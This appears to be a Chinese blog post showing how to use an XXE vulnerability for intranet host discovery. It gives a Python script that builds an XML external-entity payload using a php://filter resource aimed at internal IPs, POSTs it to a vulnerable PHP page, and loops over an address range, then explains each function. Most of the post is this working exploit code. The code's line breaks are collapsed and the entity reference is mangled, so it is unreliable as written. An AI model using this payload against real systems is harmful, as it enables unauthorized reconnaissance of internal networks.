XXE漏洞大家也应该清楚了,不清楚可以看我的另两篇博客
blog.csdn.net/qq_41918771/article/details/103628721
blog.csdn.net/qq_41918771/article/details/103641745
内网主机探测
先上脚本
import requestsdef build_xml(ip):xml = "<?xml version='1.0' encoding='UTF-8'?>\n"xml += "<!DOCTYPE xml[\n"xml += "<!ENTITY int SYSTEM 'php://filter/convert.base64-encode/resource=%s/'>\n"%ipprint(ip)xml += "]>\n"xml += "<xml>∫</xml>"send_xml(xml)def send_xml(data):x = requests.post("192.168.34.69/3.php",data=data,timeout=3).textprint(x)for i in range(65,70):try:ip = "192.168.34.%d"%ibuild_xml(ip)except:continue
这实际上也就是判断内网主机的80端口是否开启。开启了判断为存活。
首先我们构造了一个build_xml函数,这个函数的作用是构造一个post的参数。
def build_xml(ip):xml = "<?xml version='1.0' encoding='UTF-8'?>\n"xml += "<!DOCTYPE xml[\n"xml += "<!ENTITY int SYSTEM 'php://filter/convert.base64-encode/resource=%s/'>\n"%ipprint(ip)xml += "]>\n"xml += "<xml>∫</xml>"send_xml(xml)
其次是send_xml函数,这个函数用来发送。并接收结果
def send_xml(data):x = requests.post("192.168.34.69/3.php",data=data,timeout=3).textprint(x)
然后主函数做循环
for i in range(1,255):try:ip = "192.168.34.%d"%ibuild_xml(ip)except:continue
结果,方便演示,这里只探测了65到72的ip
成功在69获取到内容。
下面这句代码的意思是将ip/响应的内容进行base64编码。
php://filter/convert.base64-encode/resource=ip/'>
参考:xz.aliyun./t/3357#toc-11
更多推荐
内网,主机,XXE
发布评论